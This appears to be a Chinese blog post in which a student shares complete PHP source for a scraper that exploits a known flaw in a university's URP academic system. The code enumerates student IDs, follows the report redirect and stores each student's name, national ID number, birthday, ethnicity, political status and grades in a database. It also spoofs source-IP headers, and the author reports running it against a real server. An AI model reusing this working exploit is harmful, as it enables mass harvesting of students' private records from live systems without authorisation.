前述:
刚到一个新学校,看到群里说要去222.132.XX.XXX:80833(此处应该是写通知的老师错误,反正我是没找到80833端口),通过尔雅选选修课,出于习惯,检查了下这个IP,发现8080端口还跑着URP综合教务系统。。
前期探索:
去wooyun.org查了下相关内容,发现好多关于URP的洞,如图:
查询到cj_zwcjd.jsp这个文件,便利用了一下,正好练习一下PHP脚本。
查询流程:
用户访问cj_zwcjd.jsp页面->输入学号->点击查询->存在一个302跳转->获取反馈结果页面
程序环境:
- PHP 5.5.9 (附加:swoole 以及 Simple HTML DOM)
- MySQL 5.5.44 (主要为了记录接下来获取的信息)
部分相关介绍:
- swoole用起来感觉还不错,从之前的代码中直接copy使用了,附上一个相关的参考链接:http://rango.swoole.com/archives/265
- 为了解析接下来获取到的HTML代码,使用了Simple HTML DOM这个插件,同样附上一个参考链接:http://www.phpddt.com/manual/simplehtmldom_1_5/manual.htm
实现功能:
软件根据预设形成一个学号,并通过此学号查询此人的成绩单,查到会自动将返回的html解析,最后插入MySQL数据库中,可以获取的信息有:姓名、性别、照片(由于我这个学校的URP里没照片,没做进一步提取)、籍贯、身份证号、班级、专业、政治面貌、民族、系、学院、课程及相应成绩
软件目录结构:
注:./class/plug/simplehtmldom_1_5 这个目录下是Simple HTML DOM扩展哈
PHP文件代码
- ./config/config.inc.php (一些配置信息)
<?php
/**
* Created by PhpStorm.
* User: henry
* Date: 15-10-18
* Time: 下午8:58
*/
define('REQUEST_URL','222.132.XX.XXX');
define('REQUEST_PORT','8080');
//访问间隔,秒
define('REQUEST_SPEED',5);
- ./class/htmlFilter.class.php (HTML解析相关)
<?php
/**
* Created by PhpStorm.
* User: henry
* Date: 15-10-19
* Time: 下午4:57
*/
class htmlFilter extends sMySQL
{
private $htmlObj; //html对象
/*
* 构造函数
*/
public function __construct($html){
$this->htmlObj = new simple_html_dom();
$this->htmlObj->load($html); //从html字符加载
//$this->htmlObj->load_file($html); //从文件加载
$this->sqlLive = parent::__construct();
}
/*
* 获取照片功能
* 由于没有测试环境,暂时取消
*/
private function getPhoto(){
$photoArr = $this->htmlObj->find('img');
foreach ($photoArr as $a ){
echo $a->outertext;
}
}
/*
* 记录信息(SQL)
*/
private function recordStudentInfoSQL($studentBasicInfoArr,$courseInfoJSON){
//生成SQL
$sql = "INSERT INTO `studentInfo`(`id_card`,`real_name`,`student_id`,`sex`,`nation`,`native_place`,`political_status`,
`birthday`,`class_name`,`entrance_time`,`graduation_date`,`major`,`major_direction`,`department`,`cultivation_plan`,`courseInfo`) VALUES(
'{$studentBasicInfoArr['idCard']}','{$studentBasicInfoArr['realName']}','{$studentBasicInfoArr['studentID']}','{$studentBasicInfoArr['sex']}',
'{$studentBasicInfoArr['nation']}','{$studentBasicInfoArr['nativePlace']}','{$studentBasicInfoArr['politicalStatus']}','{$studentBasicInfoArr['birthday']}',
'{$studentBasicInfoArr['className']}','{$studentBasicInfoArr['entranceTime']}','{$studentBasicInfoArr['graduationDate']}','{$studentBasicInfoArr['major']}',
'{$studentBasicInfoArr['majorDirection']}','{$studentBasicInfoArr['department']}','{$studentBasicInfoArr['cultivationPlan']}','$courseInfoJSON')";
$this->sqlLive->send($sql);
$res = unserialize($this->sqlLive->recv());
if ($res){
return true;
} else {
return false;
}
}
/*
* 解析HTML获取学生所有信息
*
*/
private function getAndRecordStudentInfo(){
$trInfoArr = $this->htmlObj->find('td[class="report1_2_1"]');
$studentBasicInfoArr = array(
'realName' => iconv('GBK', 'UTF-8',$trInfoArr[1]->innertext), //姓名
'studentID' => iconv('GBK', 'UTF-8',$trInfoArr[3]->innertext), //学号
'sex' => iconv('GBK', 'UTF-8',$trInfoArr[4]->innertext), //性别
'idCard' => iconv('GBK', 'UTF-8',$trInfoArr[6]->innertext), //身份证号码
'nation' => iconv('GBK', 'UTF-8',$trInfoArr[9]->innertext), //民族
'nativePlace' => iconv('GBK', 'UTF-8',$trInfoArr[11]->innertext), //籍贯
'politicalStatus' => iconv('GBK', 'UTF-8',$trInfoArr[13]->innertext), //政治面貌
'birthday' => iconv('GBK', 'UTF-8',$trInfoArr[15]->innertext), //出生日期
'className' => iconv('GBK', 'UTF-8',$trInfoArr[17]->innertext), //班级
'entranceTime' => iconv('GBK', 'UTF-8',$trInfoArr[19]->innertext), //入学时间
'graduationDate' => iconv('GBK', 'UTF-8',$trInfoArr[21]->innertext), //毕业日期
'major' => iconv('GBK', 'UTF-8',$trInfoArr[23]->innertext), //专业
'majorDirection' => iconv('GBK', 'UTF-8',$trInfoArr[25]->innertext), //专业方向
'department' => iconv('GBK', 'UTF-8',$trInfoArr[27]->innertext), //系所
'cultivationPlan' => iconv('GBK', 'UTF-8',$trInfoArr[29]->innertext) //培养方案
);
for ($i=40;$i<count($trInfoArr)-9;$i+=5){
$courseInfoArr[] = array(
'courseName' => iconv('GBK', 'UTF-8',$trInfoArr[$i]->innertext), //课程名称
'score' => iconv('GBK', 'UTF-8',$trInfoArr[$i+1]->innertext), //课程分数
'studyMode' => iconv('GBK', 'UTF-8',$trInfoArr[$i+2]->innertext), //修读方式
'courseType' => iconv('GBK', 'UTF-8',$trInfoArr[$i+3]->innertext), //课程属性
'examDate' => iconv('GBK', 'UTF-8',$trInfoArr[$i+4]->innertext) //考试时间
);
}
//json编码
//echo strlen(json_encode($courseInfoArr,JSON_UNESCAPED_UNICODE));
if ($this->recordStudentInfoSQL($studentBasicInfoArr,json_encode($courseInfoArr,JSON_UNESCAPED_UNICODE)) == true){
return true;
} else {
return false;
}
}
/*
* 解析结果返回页面的html
*/
public function htmlAnalysis(){
//获取照片功能
//$this->getPhoto();
//获取并记录学生所有信息
if ($this->getAndRecordStudentInfo() == true){
return true;
} else {
return false;
}
}
/*
* 析构函数
*/
public function __destruct(){
$this->htmlObj->clear();
}
}
- ./class/request.class.php (主要为了做POST与GET请求)
<?php
/**
* Created by PhpStorm.
* User: henry
* Date: 15-10-18
* Time: 下午9:02
*/
class request
{
static private $header; //http头部
private $url; //URL
private function setURL($url){
$this->url = $url;
}
public function getURL(){
return $this->url;
}
/*
* 构造函数
*/
public function __construct($url,$sourceIP = ''){
//如果未设置源IP
if (empty($sourceIP)){
$sourceIP = $this->createIP();
}
//设置头部信息
self::$header = array(
'CLIENT-IP:'.$sourceIP,
'X-FORWARDED-FOR:8.8.8.8'
);
//设置url
$this->setURL($url);
}
/*
* 可选设置header
*/
public function setHeader($headerArr){
//Header为数组
if (!is_array($headerArr)){
echo '如果需要设置$header请传入一个数组';
exit;
}
//设置header
self::$header = $headerArr;
}
/*
* 创建一个IP地址
*/
private function createIP(){
$ip_1_arr = array('214','123','54','53','222','215','10','16');
$ip_2 = round(rand(600000,2550000)/10000);
$ip_3 = round(rand(600000,2550000)/10000);
$ip_4 = round(rand(600000,2550000)/10000);
$randArr = mt_rand(0,count($ip_1_arr)-1);
$ip_1 = $ip_1_arr[$randArr];
return $ip_1.'.'.$ip_2.'.'.$ip_3.'.'.$ip_4;
}
/*
* 通过curl发送POST请求
*/
public function httpPostParams($postDataArr){
if (!is_array($postDataArr)){
echo 'post提交的数据请以数组的形式传入';
exit;
}
$postData = '';
foreach($postDataArr as $key => $val){
$postData .= $key .'=' .$val.'&';
}
$curl = curl_init();
curl_setopt($curl,CURLOPT_HEADER,self::$header);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt ($curl,CURLOPT_POSTFIELDS, $postData);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0');
$result = curl_exec($curl);
$httpCode = curl_getinfo($curl,CURLINFO_HTTP_CODE);
curl_close($curl);
switch ($httpCode){
case '302':{
return $result;
}
break;
default:{
return false;
}
}
}
/*
* 通过curl进行GET请求
*/
public function httpGetParams($url = ''){
$curl = curl_init($url);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0');
$result = curl_exec($curl);
$httpCode = curl_getinfo($curl,CURLINFO_HTTP_CODE);
curl_close($curl);
//echo $url;
switch ($httpCode){
case '200':{
return $result;
}
break;
default:{
return false;
}
}
}
}
- ./class/stringFilter.php (字符串过滤,主要为了获取a标签中的href值)
<?php
/**
* Created by PhpStorm.
* User: henry
* Date: 15-10-19
* Time: 下午4:40
*/
class stringFilter
{
/*
* 构造函数
*/
public function __construct(){
}
/*
* 获取302跳转后的a标签的href
*/
public function getTagA_Href($html){
return str_replace('="','',strstr(strstr($html,'="',false),'">',true));
//strstr(strstr($html,'="',false),'">',true);
//strstr($html,'<a ',false);
}
/*
* 通过HTML获取结果页面的PDF下载链接
*/
public function getStudentInfoPdfDownload($html){
}
}
- ./class/studentID.class.php (这个想了想,还需要改很多,就先临时简单处理了一下)
<?php
/**
* Created by PhpStorm.
* User: henry
* Date: 15-10-20
* Time: 下午8:45
*/
class studentID
{
private static $grade; //年级
/*
* 构造函数
* 形参:年级
*/
public function __construct($grade){
self::$grade = $grade;
}
/*
* 创建学号信息
*/
public function createStudentID($departmentNum = 1000,$studentNum = 1000){
return self::$grade.$departmentNum.$studentNum;
}
}
- ./do_cli.php (CLI模式下执行主程序)
<?php
/**
* Created by PhpStorm.
* User: henry
* Date: 15-10-18
* Time: 下午8:58
*/
require_once 'config/config.inc.php';
require_once 'class/request.class.php';
require_once 'class/sMySQL.class.php';
require_once 'class/htmlFilter.class.php';
require_once 'class/stringFilter.class.php';
require_once 'class/plug/simplehtmldom_1_5/simple_html_dom.php';
require_once 'class/studentID.class.php';
//设置URL
$url = REQUEST_URL.':'.REQUEST_PORT.'/setReportParams';
$req = new request($url);
$stuID = new studentID(2012);
$getA_Href = new stringFilter();
//学院编号循环
for ($d=1270;$d<8000;$d++){
//学生编号循环
for ($s=1001;$s<8000;$s++){
//创建POST值
$postData = array(
'LS_XH' => $stuID->createStudentID($d,$s),
'resultPage'=> 'http%3A%2F%2F222.132.XX.XXX%3A8080%2FreportFiles%2Fcj%2Fcj_zwcjd.jsp'
);
//POST请求新的请求
$result = $req->httpPostParams($postData);
//如果返回302
if ($result != false){
//获取A标签的href值,再根据A标签重新设定url,进行GET请求
$html = $req->httpGetParams($getA_Href->getTagA_Href($result));
//如果成功获取html数据
if ($html != false){
$record = new htmlFilter($html);
//记录数据
if ($record->htmlAnalysis() == true){
echo 'success!';
} else {
echo 'record fail!';
}
$record->__destruct();
} else {
echo 'get html page fail!';
}
}
sleep(REQUEST_SPEED);
}
}
执行:
Linux下,进入do_cli.php的目录下,直接执行:#php do_cli.php
注意问题:
- 由于用到swoole扩展,需要通过命令#php -m检查是否包含此模块。
- 记得先启用swoole监听程序,然后否则会记录失败。
- 要注意通过curl请求的时候,加入一个userAgent,否则系统返回500错误 – –
执行结果截图:
注:本来想直接获取PDF/Text/Excel文件得了,后来想了想,不如存在数据库里面方便,就把成绩单的课程相关内容,转成了JSON格式存储在数据库中。
后续:
这第一个版本,还有很多地方没处理,如:多线程、学号相关、错误输出不人性等等,仅供学习与记录吧。